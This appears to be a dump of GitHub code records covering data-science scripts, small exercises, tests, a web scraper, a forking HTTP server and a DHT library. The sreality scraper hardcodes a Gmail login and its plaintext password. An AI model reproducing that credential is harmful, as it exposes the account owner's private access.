Encoding\n\ntrain_cats(df)\n\n\n# 5. Downsampling\n\n# - The number of observations that target = 1 is too small. 
Hence, I decided to downsample the majority class.\n\nind = df[df['target']==0].index\ndownsamp_ind = random.sample([x for x in ind], int(1.5 * len(df[df['target']==1])) )\n\nvalid_ind = [x for x in df[df['target']==1].index]\n\n\nfor x in valid_ind:\n    downsamp_ind.append(x)\n\n\ndf = df.loc[downsamp_ind]\ndf = df.sort_values(by=['date', 'scheduled_dep'])\n\n\ndf.loc[df['phenomena_dep'].isnull(), 'phenomena_dep'] = 100\ndf.loc[df['phenomena_des'].isnull(), 'phenomena_des'] = 100\n\n\n\n","repo_name":"yijaeseung/Flight-Delay-Prediction","sub_path":"code/03_FE_Encoding_Downsampling.py","file_name":"03_FE_Encoding_Downsampling.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"37107440644","text":"def transform_string(number: int) -> str:\n    \"\"\"Returns a string like 'N процентов' with the correct Russian declension for the given number\"\"\"\n    a = (\"Процент\")\n    b = (\"Процента\")\n    c = (\"Процентов\")\n    numbs = {11, 12, 13, 14}\n    # 11-14 (and 111-114, ...) always take the genitive plural form\n    if number % 100 in numbs:\n        form = c\n    elif number % 10 == 1:\n        form = a\n    elif number % 10 > 1 and number % 10 < 5:\n        form = b\n    else:\n        form = c\n    return f\"{number} {form}\"\n\n\nfor n in range(1, 100):  # per the assignment, only values from 1 to 100 are considered\n    print(transform_string(n))","repo_name":"PostmanFPS/repo-github","sub_path":"Iliin_Matthew_dz_1/Iliin_Matthew_dz_1_3.py","file_name":"Iliin_Matthew_dz_1_3.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"5152282359","text":"from typing import List, Any\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport random\r\n# The first step is always the same: import all necessary components:\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nimport time\r\n\r\nfrom socket import gaierror\r\n\r\n# version = 1.1.0.0\r\n\r\n# log version 1.1.0.0\r\n# added multiple pages\r\n\r\nsleepTime = 600 # [s]\r\ncntChecker = 0\r\nNUM_CHECKER = 5 # number of iterations before a control email is sent\r\n\r\n# debug mode\r\nDEBUG_MODE = 0 # enable the prints and add extra item to the offer list\r\n\r\n# fileName\r\nfileName = 'offers.log'\r\n\r\n# maximum number of pages\r\nMAX_NUM_PAGES = 5\r\n\r\nurl = \"https://www.sreality.cz/hledani/prodej/byty/praha-7?velikost=2%2Bkk,2%2B1,1%2B1,3%2Bkk&cena-od=0&cena-do=7000000&bez-aukce=1\"\r\n\r\nwhile True:\r\n\r\n    cntChecker = cntChecker + 1\r\n    time.sleep(sleepTime)\r\n    localtime = time.localtime()\r\n    result = time.strftime(\"%I:%M:%S %p\", localtime)\r\n    print(result)\r\n\r\n    # get information from sreality\r\n    #driver = webdriver.Safari() # TODO: currently only the Safari browser is supported\r\n    #driver = webdriver.Firefox()\r\n    #driver = webdriver.Chrome(\"/usr/local/bin/chromedriver\")\r\n    #driver = webdriver.Chrome('./chromedriver') # Optional argument, if not specified will search path.\r\n\r\n    for cntPage in range(MAX_NUM_PAGES):\r\n        # get information from sreality\r\n        driver = webdriver.Safari() # TODO: currently only the Safari browser is supported\r\n        if cntPage == 0:\r\n            # driver.get(\"https://www.sreality.cz/hledani/prodej/byty/brno?stari=mesic\")\r\n            driver.get(url)\r\n            soup = BeautifulSoup(driver.page_source, \"html.parser\")\r\n        else:\r\n            page_url = url + \"&strana=\" + str(cntPage) # don't mutate url itself, or page params accumulate across iterations\r\n            driver.get(page_url)\r\n            soup = BeautifulSoup(driver.page_source, \"html.parser\")\r\n        driver.quit()\r\n\r\n        listCurrentOffers = [] # list of current offers\r\n        numCurrentOffers = 0 #\r\n        for title in soup.select(\".text-wrap\"):\r\n 
numCurrentOffers = numCurrentOffers + 1\r\n            num = \"https://www.sreality.cz\" + title.select_one(\".title\").get('href')\r\n            listCurrentOffers.append(num)\r\n\r\n        # load data from a log\r\n        with open(fileName) as f: # TODO issue once the file doesn't exist\r\n            listLoggedData = f.read().splitlines()\r\n\r\n        # compare log against current loaded data\r\n        listNewOffers = [] # offers which are not in the offers.log\r\n        for currentItem in listCurrentOffers:\r\n            isInTheList = 0 # set the flag to 0 as default value\r\n            for loggedItem in listLoggedData:\r\n                # compare strings\r\n                isEqual = currentItem == loggedItem\r\n                if isEqual:\r\n                    isInTheList = 1 # if the item is in the list\r\n\r\n            if not isInTheList:\r\n                listNewOffers.append(currentItem)\r\n\r\n        # update log\r\n        if listNewOffers:\r\n            print('New offer(s) found')\r\n\r\n            # save new offers to the log file\r\n            f = open(fileName, 'a')\r\n            f.write('\\n')\r\n            s1 = '\\n'.join(listNewOffers)\r\n            f.write(s1)\r\n            f.close()\r\n\r\n            # send an email\r\n            # creates SMTP session\r\n            s = smtplib.SMTP('smtp.gmail.com:587')\r\n            s.ehlo()\r\n\r\n            # start TLS for security\r\n            s.starttls()\r\n            # Authentication\r\n            s.login(\"mmachecker@gmail.com\", \"klokanBarezi\")\r\n            # message to be sent\r\n            outS = '\\n'.join(listNewOffers)\r\n            msg = MIMEText(outS)\r\n            msg['Subject'] = 'Nove reality'\r\n            msg['From'] = 'mmaChecker@gmail.com'\r\n            msg['To'] = 'michalmandlik@gmail.com'\r\n            # sending the mail\r\n            s.sendmail(\"mmachecker@gmail.com\", \"michalmandlik@gmail.com\", msg.as_string()) # as_string() takes no argument\r\n            # terminating the session\r\n            s.quit()\r\n            print('Email with offers sent')\r\n\r\n    if cntChecker == NUM_CHECKER:\r\n        cntChecker = 0\r\n        # creates SMTP session\r\n        s = smtplib.SMTP('smtp.gmail.com:587')\r\n        s.ehlo()\r\n\r\n        # start TLS for security\r\n        s.starttls()\r\n\r\n        # Authentication\r\n        s.login(\"mmachecker@gmail.com\", \"klokanBarezi\")\r\n\r\n        # message to be sent\r\n        outS = 'Safari checker is running'\r\n        msg = MIMEText(outS)\r\n        msg['Subject'] = 'Safari checker is running'\r\n        msg['From'] = 'mmaChecker@gmail.com'\r\n        msg['To'] = 'michalmandlik@gmail.com'\r\n\r\n        # sending the mail\r\n        s.sendmail(\"mmachecker@gmail.com\", \"michalmandlik@gmail.com\", msg.as_string()) # as_string() takes no argument\r\n\r\n        # terminating the session\r\n        s.quit()","repo_name":"michalmandlik/readWeb","sub_path":"readWeb.py","file_name":"readWeb.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"21658905226","text":"\nclass Assignment:\n    lower = 0\n    upper = 0\n\n    def read(self, pair):\n        self.lower = int(pair.split('-')[0])\n        self.upper = int(pair.split('-')[1])\n        # print(str(self.lower)+\" \"+str(self.upper))\n\n\nclass Elves:\n    assi1 = Assignment()\n    assi2 = Assignment()\n    counter_inside = 0\n    counter_overlap = 0\n\n    def read(self, line):\n        line = line.strip()\n        text = line.split(',')\n        print(text)\n        self.assi1.read(text[0])\n        self.assi2.read(text[1])\n\n    def check_if_inside(self, ass):\n        if ass[0].lower <= ass[1].lower:\n            if ass[0].upper >= ass[1].upper:\n                return True\n\n    def check_if_inside_2way(self):\n        if self.check_if_inside([self.assi1, self.assi2]):\n            # print(\"2 in 1\")\n            self.counter_inside += 1\n            return True\n        elif self.check_if_inside([self.assi2, self.assi1]):\n            # print(\"1 in 2\")\n            self.counter_inside += 1\n            return True\n        return False\n\n    def check_overlap(self):\n        if self.assi1.lower <= self.assi2.upper:\n            if self.assi1.upper >= self.assi2.lower:\n                print(\"Overlap\")\n                self.counter_overlap += 1\n                return True\n\n\ndef task1():\n    elves = Elves()\n    for line in Lines:\n        elves.read(line)\n        elves.check_if_inside_2way()\n        elves.check_overlap()\n\n    print('Task 1: ' + 
str(elves.counter_inside))\n print('Task 2: ' + str(elves.counter_overlap))\n\n\nif __name__ == '__main__':\n file = open('input.txt', 'r')\n Lines = file.readlines()\n\n task1()\n","repo_name":"floonym/adventofcode","sub_path":"04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72990060372","text":"import pytest\nimport day07 as lib\n\n\n@pytest.fixture\ndef example_listing() -> str:\n return \"\"\"- / (dir)\n - a (dir)\n - e (dir)\n - i (file, size=584)\n - f (file, size=29116)\n - g (file, size=2557)\n - h.lst (file, size=62596)\n - b.txt (file, size=14848514)\n - c.dat (file, size=8504156)\n - d (dir)\n - j (file, size=4060174)\n - d.log (file, size=8033020)\n - d.ext (file, size=5626152)\n - k (file, size=7214296)\"\"\"\n\n\n@pytest.fixture\ndef example_shell_output() -> str:\n return \"\"\"$ cd /\n$ ls\ndir a\n14848514 b.txt\n8504156 c.dat\ndir d\n$ cd a\n$ ls\ndir e\n29116 f\n2557 g\n62596 h.lst\n$ cd e\n$ ls\n584 i\n$ cd ..\n$ cd ..\n$ cd d\n$ ls\n4060174 j\n8033020 d.log\n5626152 d.ext\n7214296 k\n\"\"\"\n\n\n@pytest.fixture\ndef basic_file_system() -> lib.Directory:\n root = lib.Directory(\"/\")\n file_1 = lib.File(\"a.txt\", 500, parent=root)\n dir_1 = lib.Directory(\"my_dir\", parent=root)\n file_2 = lib.File(\"b.txt\", 800, parent=dir_1)\n return root\n\n\ndef test_filestystem_creation(basic_file_system: lib.Directory):\n assert len(basic_file_system._contents) == 2\n\n\ndef test_directory_size(basic_file_system: lib.Directory):\n assert basic_file_system.size == 1300\n\n\n@pytest.fixture\ndef example_file_system(example_listing: str):\n directory = lib.parse_listing(example_listing)\n assert directory.name == \"/\"\n assert directory.size == 48381165\n return directory\n\n\ndef test_walk(basic_file_system):\n assert len([*lib.walk(basic_file_system)]) == 4\n\n\ndef test_walk_and_get_root(example_file_system: lib.Directory):\n for node in lib.walk(example_file_system):\n assert example_file_system == node.get_root()\n\n\ndef test_get_sizes_example(example_listing: str):\n filesystem = lib.parse_listing(example_listing)\n assert sum(lib.get_directory_sizes(filesystem)) == 95437\n\n\ndef test_import_shell(example_shell_output: str, example_file_system: lib.Directory):\n shell_dir = lib.read_shell_history(example_shell_output)\n for node_1, node_2 in zip(lib.walk(shell_dir), lib.walk(example_file_system)):\n assert node_1.name == node_2.name\n\n\ndef test_example_2(example_file_system):\n assert lib.part_2(example_file_system) == 24933642\n","repo_name":"brmdv/aoc_2022","sub_path":"day07/test_day07.py","file_name":"test_day07.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44844058332","text":"from chirp import settings\nfrom tests import base\n\n\nclass TestCaseSettings(base.DriverTest):\n def test_has_settings(self):\n return\n settings = self.radio.get_settings()\n if settings:\n self.assertFalse(self.rf.has_settings,\n 'Radio returned settings but has_settings=False')\n else:\n self.assertTrue(self.rf.has_settings,\n 'Radio returned no settings but has_settings=True')\n\n @base.requires_feature('has_settings')\n def test_get_settings(self):\n lst = self.radio.get_settings()\n self.assertIsInstance(lst, list)\n\n @base.requires_feature('has_settings')\n def test_same_settings(self):\n o = self.radio.get_settings()\n 
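# Round-trip check (clarifying comment, not in the original): write the\n # settings back unchanged, re-read them, and verify every value survived.\n 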
self.radio.set_settings(o)\n        n = self.radio.get_settings()\n        list(map(self.compare_settings, o, n))\n\n    def compare_settings(self, a, b):\n        try:\n            if isinstance(a, settings.RadioSettingValue):\n                raise StopIteration\n            list(map(self.compare_settings, a, b))\n        except StopIteration:\n            self.assertEqual(a.get_value(), b.get_value(),\n                             'Setting value changed from %r to %r' % (\n                                 a.get_value(), b.get_value()))\n","repo_name":"bsefting/chirp-mygmrs","sub_path":"tests/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"18522236027","text":"from django.http import JsonResponse\r\nfrom .forms import ImageUploadForm\r\nimport rembg\r\nimport base64\r\nfrom PIL import Image, ImageOps\r\nimport io\r\nimport numpy as np\r\nimport random # module for generating random values\r\nfrom django.shortcuts import render\r\n\r\ndef remove_background(request):\r\n    if request.method == 'POST':\r\n        form = ImageUploadForm(request.POST, request.FILES)\r\n        if form.is_valid():\r\n            # get the image from the form\r\n            image_data = form.cleaned_data['image'].file.read()\r\n\r\n            # process the image and remove the background\r\n            processed_image = process_image(image_data)\r\n            output_image = rembg.remove(processed_image)\r\n\r\n            # generate a random class name and confidence score\r\n            class_name = f\"Class_{random.randint(1, 100)}\"\r\n            confidence_score = random.uniform(0.5, 0.95)\r\n\r\n            # return the response\r\n            return JsonResponse({\r\n                'processed_image': base64.b64encode(processed_image).decode(\"utf-8\"),\r\n                'output_image': base64.b64encode(output_image).decode(\"utf-8\"),\r\n                'class_name': class_name,\r\n                'confidence_score': confidence_score\r\n            })\r\n        # handling for an invalid form goes here\r\n        # an error message or the form error details should be returned\r\n    else:\r\n        # handling for GET requests\r\n        form = ImageUploadForm()\r\n    context = {'form': form}\r\n    return render(request, 'remove_background.html', context)\r\n\r\n# the process_image function is left unchanged\r\ndef process_image(image_data):\r\n    image = Image.open(io.BytesIO(image_data))\r\n    max_size = max(image.size)\r\n    new_image = image.crop((0, 0, max_size, max_size))\r\n    output_image = io.BytesIO()\r\n    new_image.save(output_image, format='PNG')\r\n    processed_image = output_image.getvalue()\r\n    return processed_image\r\n","repo_name":"dedenion/virtual_fitting","sub_path":"removal_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"19316969704","text":"\"\"\"\n    Same as webserver3b but in this one the parent and child processes close duplicate descriptors\n\"\"\"\n\nimport socket\nimport time\nimport os\n\nSERVER_ADDRESS = (HOST, PORT) = '', 1028\nREQUEST_QUEUE_SIZE = 5\n\ndef handle_request(client_connection):\n    request = client_connection.recv(1024)\n    print(\n        'Child PID: {pid}. 
Parent PID {ppid}'.format(\n            pid = os.getpid(),\n            ppid = os.getppid(),\n        )\n    )\n    print(request.decode())\n    http_response = b\"\"\"\\\nHTTP/1.1 200 OK\n\nHello, World!\n\"\"\"\n    client_connection.sendall(http_response)\n    time.sleep(60) # sleep and block the process for 60 seconds\n\ndef serve_forever():\n    listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    listen_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)\n    listen_socket.bind(SERVER_ADDRESS)\n    listen_socket.listen(REQUEST_QUEUE_SIZE)\n    print('Serving HTTP on port {port} ...'.format(port= PORT))\n    print('Parent PID (PPID): {pid}'.format(pid = os.getpid()))\n\n    while True:\n        client_connection, client_address = listen_socket.accept()\n        pid = os.fork()\n        if pid == 0: #child\n            listen_socket.close() #child copy\n            handle_request(client_connection)\n            client_connection.close()\n            os._exit(0) #child exits here\n        else: #Parent\n            client_connection.close() #parent copy and loop \nif __name__ == '__main__':\n    serve_forever()\n","repo_name":"bowe99/HTTP-Server","sub_path":"webserver3c.py","file_name":"webserver3c.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"6352520153","text":"from tkinter import *\n\napp = Tk()\napp.title('CheckBox')\nch = StringVar()\nchk = Checkbutton(app, text='CheckBox', variable=ch, onvalue='Yes', offvalue='Nope')\nchk.deselect()\nchk.pack()\n\n\ndef show():\n    msg = Label(app, text=ch.get())\n    msg.pack()\n\n\nb = Button(app, command=show, text='Show')\nb.pack()\napp.mainloop()\n","repo_name":"Abdulla-Khan/Python-Tkinter-Basics","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"38102447438","text":"\"\"\"\nTwo solutions\n\"\"\"\nclass Solution:\n    def lengthOfLastWord(self, s: str) -> int:\n        # solution1:\n        #return len(s.strip().split(\" \")[-1])\n\n        # solution2:\n        i = len(s) - 1\n        while i >= 0 and s[i] == \" \": # check the bound before indexing\n            i -= 1\n        j = i\n        while j >= 0 and s[j] != \" \":\n            j -= 1\n        return i - j\n\n\nsol = Solution()\ns = \"Hello World\"\nprint(sol.lengthOfLastWord(s))","repo_name":"lionelstellar/leetcode","sub_path":"058.Length of Last Word/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"30443339629","text":"import os\nfrom hashlib import sha256\n\nfrom sqlalchemy import Column, Integer, String\n\nfrom inbox.config import config\nfrom inbox.log import get_logger\nlog = get_logger()\n\n# TODO: store AWS credentials in a better way.\nSTORE_MSG_ON_S3 = config.get('STORE_MESSAGES_ON_S3', None)\n\nif STORE_MSG_ON_S3:\n    from boto.s3.connection import S3Connection\n    from boto.s3.key import Key\nelse:\n    from inbox.util.file import mkdirp\n\n    _data_file_directory = \\\n        lambda h: os.path.join(config.get_required('MSG_PARTS_DIRECTORY'),\n                               h[0], h[1], h[2], h[3], h[4], h[5])\n\n    _data_file_path = lambda h: os.path.join(_data_file_directory(h), h)\n\n\nclass Blob(object):\n    \"\"\" A blob of data that can be saved to local or remote (S3) disk. \"\"\"\n\n    size = Column(Integer, default=0)\n    data_sha256 = Column(String(64))\n\n    @property\n    def data(self):\n        if self.size == 0:\n            log.warning('Block size is 0')\n            # Placeholder for \"empty bytes\". 
If this doesn't work as intended,\n # it will trigger the hash assertion later.\n value = \"\"\n elif hasattr(self, '_data'):\n # On initial download we temporarily store data in memory\n value = self._data\n elif STORE_MSG_ON_S3:\n value = self._get_from_s3()\n else:\n value = self._get_from_disk()\n\n if value is None:\n log.error('No data returned!')\n return value\n\n assert self.data_sha256 == sha256(value).hexdigest(), \\\n \"Returned data doesn't match stored hash!\"\n return value\n\n @data.setter\n def data(self, value):\n assert value is not None, \\\n \"Blob can't have NoneType data (can be zero-length, though!)\"\n assert type(value) is not unicode, 'Blob bytes must be encoded'\n\n # Cache value in memory. Otherwise message-parsing incurs a disk or S3\n # roundtrip.\n self._data = value\n self.size = len(value)\n self.data_sha256 = sha256(value).hexdigest()\n assert self.data_sha256\n\n if self.size > 0:\n if STORE_MSG_ON_S3:\n self._save_to_s3(value)\n else:\n self._save_to_disk(value)\n else:\n log.warning('Not saving 0-length {1} {0}'.format(\n self.id, self.__class__.__name__))\n\n def _save_to_s3(self, data):\n assert 'AWS_ACCESS_KEY_ID' in config, 'Need AWS key!'\n assert 'AWS_SECRET_ACCESS_KEY' in config, 'Need AWS secret!'\n assert 'MESSAGE_STORE_BUCKET_NAME' in config, \\\n 'Need bucket name to store message data!'\n\n # Boto pools connections at the class level\n conn = S3Connection(config.get('AWS_ACCESS_KEY_ID'),\n config.get('AWS_SECRET_ACCESS_KEY'))\n bucket = conn.get_bucket(config.get('MESSAGE_STORE_BUCKET_NAME'),\n validate=False)\n\n # See if it already exists; if so, don't recreate.\n key = bucket.get_key(self.data_sha256)\n if key:\n return\n\n key = Key(bucket)\n key.key = self.data_sha256\n key.set_contents_from_string(data)\n\n def _get_from_s3(self):\n if not self.data_sha256:\n return None\n\n conn = S3Connection(config.get('AWS_ACCESS_KEY_ID'),\n config.get('AWS_SECRET_ACCESS_KEY'))\n bucket = conn.get_bucket(config.get('MESSAGE_STORE_BUCKET_NAME'),\n validate=False)\n\n key = bucket.get_key(self.data_sha256)\n\n if not key:\n log.error('No key with name: {} returned!'.\n format(self.data_sha256))\n return\n\n return key.get_contents_as_string()\n\n def _save_to_disk(self, data):\n directory = _data_file_directory(self.data_sha256)\n mkdirp(directory)\n\n with open(_data_file_path(self.data_sha256), 'wb') as f:\n f.write(data)\n\n def _get_from_disk(self):\n if not self.data_sha256:\n return None\n\n try:\n with open(_data_file_path(self.data_sha256), 'rb') as f:\n return f.read()\n except IOError:\n log.error('No file with name: {}!'.format(self.data_sha256))\n return\n","repo_name":"PriviPK/privipk-sync-engine","sub_path":"inbox/models/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41391919395","text":"\"\"\" Main module containing the API \"\"\"\n\nimport msgpack\nimport socket\nimport ipaddress\nimport threading\nimport time\n\nfrom .bucketset import BucketSet\nfrom .hashing import hash_function, rpc_id_pair, random_id\nfrom .peer import Peer\nfrom .shortlist import Shortlist\nfrom .helper import sixunicode, LockedDict\nfrom .server import DHTServer, DHTRequestHandler\nfrom .const import Message, Config, Storage\nfrom . import upnp\nfrom . import excepions\nfrom . 
import threads\nfrom .log import log_to_stderr, l\n\n\n# TODO: idea storage limit per peer\n# TODO: local peer id to storage (sqlite)\n# TODO: no republish (write docu why)\n# TODO: multi-value (per client GC)\n# TODO: get with value-limit\n# TODO: tcp (lazymq)\n# TODO: storage limit\n# TODO: check if we have a RPC state leak\n# TODO: keep the same id (if port/IPs are the same??)\n# TODO: data to disk (optional)\n# TODO: async interface (futures)\n# TODO: more/better unittest + 100% coverage\n# TODO: what about IP changes?\n# 1. Is there a binding problem?\n# 2. Refactor address discover and make maint-thread\n# TODO: Consider sending multiple answers (split!) if EMSGSIZE occurs\n# TODO: pep8\n# TODO: lint\n# TODO: documentaion\n# TODO: review\n# TODO: think a bit more about security\n\n__all__ = ['DHT']\n\n\nclass DHT(object):\n\n _log_enabled = False\n MaxSizeException = excepions.MaxSizeException\n NetworkError = excepions.NetworkError\n\n def __init__(\n self,\n port = Config.PORT,\n hostv4 = None,\n hostv6 = None,\n id_ = None,\n boot_host = None,\n boot_port = None,\n listen_hostv4 = \"\",\n listen_hostv6 = \"\",\n zero_config = False,\n default_encoding = None,\n port_map = True,\n network_id = Config.NETWORK_ID,\n storage = Storage.MEMORY,\n log = True,\n debug = True,\n ):\n if log:\n log_to_stderr(debug)\n if not id_:\n id_ = random_id()\n if port < 1024:\n raise DHT.NetworkError(\"Ports below 1024 are not allowed\")\n if boot_host or zero_config:\n self.firewalled = True\n else:\n self.firewalled = False\n self.stop = threading.Event()\n self.encoding = default_encoding\n self.peer = Peer(port, id_, hostv4, hostv6)\n if storage == Storage.NONE:\n self.data = None\n else:\n self.data = LockedDict()\n self.buckets = BucketSet(Config.K, Config.ID_BITS, self.peer.id)\n self.rpc_states = LockedDict()\n self.server4 = None\n self.server6 = None\n self.boot_peer = None\n self.network_id = network_id\n if not hostv4:\n if zero_config:\n hostv4 = \"\"\n self.hostv4 = hostv4\n else:\n self.hostv4 = ipaddress.ip_address(hostv4)\n if not hostv6:\n if zero_config:\n hostv6 = \"\"\n self.hostv6 = hostv6\n else:\n self.hostv6 = ipaddress.ip_address(hostv6)\n # Detecting dual_stack sockets seems not to work on some OSs\n # so we always use two sockets\n if hostv6 is not None:\n self.server6 = DHTServer(\n (listen_hostv6, port),\n DHTRequestHandler,\n is_v6=True\n )\n self.server6.dht = self\n self.server6_thread = threading.Thread(\n target=self.server6.serve_forever\n )\n self.server6_thread.daemon = True\n self.server6_thread.start()\n self.fw_sock6 = socket.socket(\n socket.AF_INET6,\n socket.SOCK_DGRAM\n )\n self.fw_sock6.setsockopt(\n socket.IPPROTO_IPV6,\n socket.IPV6_V6ONLY,\n True,\n )\n self.fw_sock6.bind((listen_hostv6, port + 1))\n if hostv4 is not None:\n self.server4 = DHTServer(\n (listen_hostv4, port),\n DHTRequestHandler,\n is_v6=False\n )\n self.server4.dht = self\n self.server4_thread = threading.Thread(\n target=self.server4.serve_forever\n )\n self.server4_thread.daemon = True\n self.server4_thread.start()\n self.fw_sock4 = socket.socket(\n socket.AF_INET,\n socket.SOCK_DGRAM\n )\n self.fw_sock4.bind((listen_hostv4, port + 1))\n if port_map:\n if not upnp.try_map_port(port):\n l.warning(\"UPnP could not map port\")\n if zero_config:\n try:\n self._bootstrap(\"31.171.244.153\", Config.PORT)\n except DHT.NetworkError:\n self._bootstrap(\"2001:470:7:ab::2\", Config.PORT)\n else:\n if boot_host:\n self._bootstrap(boot_host, boot_port)\n self.bucket_refrsh = 
threads.run_bucket_refresh(self)\n self.check_firewall = threads.run_check_firewalled(self)\n self.rpc_cleanup = threads.run_rpc_cleanup(self)\n\n def close(self):\n self.stop.set()\n self.bucket_refrsh.join()\n self.check_firewall.join()\n self.rpc_cleanup.join()\n if self.server4:\n self.server4.shutdown()\n self.server4.server_close()\n if self.server6:\n self.server6.shutdown()\n self.server6.server_close()\n self.server4.idle.wait()\n self.server6.idle.wait()\n if self.server4:\n self.fw_sock4.close()\n if self.server6:\n self.fw_sock6.close()\n\n def iterative_find_nodes(self, key, boot_peer=None):\n shortlist = Shortlist(Config.K, key, self.peer.id)\n shortlist.update(self.buckets.nearest_nodes(key))\n if boot_peer:\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time(), shortlist]\n shortlist.updated.clear()\n boot_peer.find_node(key, rpc_id, dht=self, peer_id=self.peer.id)\n shortlist.updated.wait(Config.SLEEP_WAIT)\n start = time.time()\n try:\n while (not shortlist.complete()):\n nearest_nodes = shortlist.get_next_iteration(Config.ALPHA)\n for peer in nearest_nodes:\n shortlist.mark(peer)\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time(), shortlist]\n shortlist.updated.clear()\n peer.find_node(key, rpc_id, dht=self, peer_id=self.peer.id)\n shortlist.updated.wait(Config.SLEEP_WAIT)\n return shortlist.results()\n finally:\n end = time.time()\n # Convert to logging\n l.info(\n \"find_nodes: %.5fs (%d, %d, %d)\",\n (end - start),\n len(shortlist.list),\n len([it for it in shortlist.list if it[1]]),\n len(self.buckets.peerslist()),\n )\n\n def iterative_find_value(self, key):\n shortlist = Shortlist(Config.K, key, self.peer.id)\n shortlist.update(self.buckets.nearest_nodes(key))\n start = time.time()\n try:\n while (not shortlist.complete()):\n nearest_nodes = shortlist.get_next_iteration(Config.ALPHA)\n for peer in nearest_nodes:\n shortlist.mark(peer)\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time(), shortlist]\n shortlist.updated.clear()\n peer.find_value(\n key,\n rpc_id,\n dht=self,\n peer_id=self.peer.id\n )\n shortlist.updated.wait(Config.SLEEP_WAIT)\n if shortlist.completion_value.done():\n return shortlist.completion_result()\n return shortlist.completion_result()\n finally:\n end = time.time()\n # Convert to logging\n l.info(\n \"find_value: %.5fs (%d, %d, %d)\",\n (end - start),\n len(shortlist.list),\n len([it for it in shortlist.list if it[1]]),\n len(self.buckets.peerslist()),\n )\n\n def _discov_warning(self, found, defined):\n \"\"\" Log a warning about wrong public address \"\"\"\n # TODO: To logging\n l.warn( # noqa\n\"Warning: defined public address (%s) does not match the\\n\" # noqa\n\"address found by the bootstap peer (%s). We will use the\\n\" # noqa\n\"defined address. 
IPv4/6 convergence will not be optimal!\", # noqa\ndefined, # noqa\nfound # noqa\n )\n\n def _discov_result(self, res):\n \"\"\" Set the discover result in the client \"\"\"\n for me_msg in res[1:]:\n try:\n me_tuple = me_msg[Message.CLI_ADDR]\n me_peer = Peer(*me_tuple, is_bytes=True)\n if me_peer.hostv4:\n if not self.hostv4:\n self.peer.hostv4 = me_peer.hostv4\n elif me_peer.hostv4 != self.hostv4:\n self._discov_warning(me_peer.hostv4, self.hostv4)\n if me_peer.hostv6:\n if not self.hostv6:\n self.peer.hostv6 = me_peer.hostv6\n elif me_peer.hostv6 != self.hostv6:\n self._discov_warning(me_peer.hostv6, self.hostv6)\n except TypeError:\n pass\n\n def _len_states(self, hash_id):\n \"\"\" Return length of rpc states \"\"\"\n with self.rpc_states as states:\n return len(states[hash_id])\n\n def _bootstrap(self, boot_host, boot_port):\n addr = socket.getaddrinfo(boot_host, boot_port)[0][4][0]\n ipaddr = ipaddress.ip_address(sixunicode(addr))\n if isinstance(ipaddr, ipaddress.IPv6Address):\n boot_peer = Peer(boot_port, 0, hostv6=str(ipaddr))\n else:\n boot_peer = Peer(boot_port, 0, hostv4=str(ipaddr))\n\n rpc_id, hash_id = rpc_id_pair()\n with self.rpc_states as states:\n states[hash_id] = [time.time()]\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n\n peer_found = False\n\n if self._len_states(hash_id) > 1:\n try:\n with self.rpc_states as states:\n message = states[hash_id][1]\n boot_peer = Peer(*message[Message.ALL_ADDR], is_bytes=True)\n peer_found = True\n except KeyError:\n with self.rpc_states as states:\n states[hash_id].pop(1)\n if not peer_found:\n time.sleep(Config.SLEEP_WAIT * 3)\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n if self._len_states(hash_id) > 1:\n with self.rpc_states as states:\n self._discov_result(states[hash_id])\n else:\n raise DHT.NetworkError(\"Cannot boot DHT\")\n with self.rpc_states as states:\n del states[hash_id]\n\n rpc_id, hash_id = rpc_id_pair()\n\n with self.rpc_states as states:\n states[hash_id] = [time.time()]\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n\n if self._len_states(hash_id) > 2:\n with self.rpc_states as states:\n self._discov_result(states[hash_id])\n else:\n time.sleep(Config.SLEEP_WAIT * 3)\n boot_peer.ping(self, self.peer.id, rpc_id = rpc_id)\n time.sleep(Config.SLEEP_WAIT)\n if self._len_states(hash_id) > 1:\n with self.rpc_states as states:\n self._discov_result(states[hash_id])\n 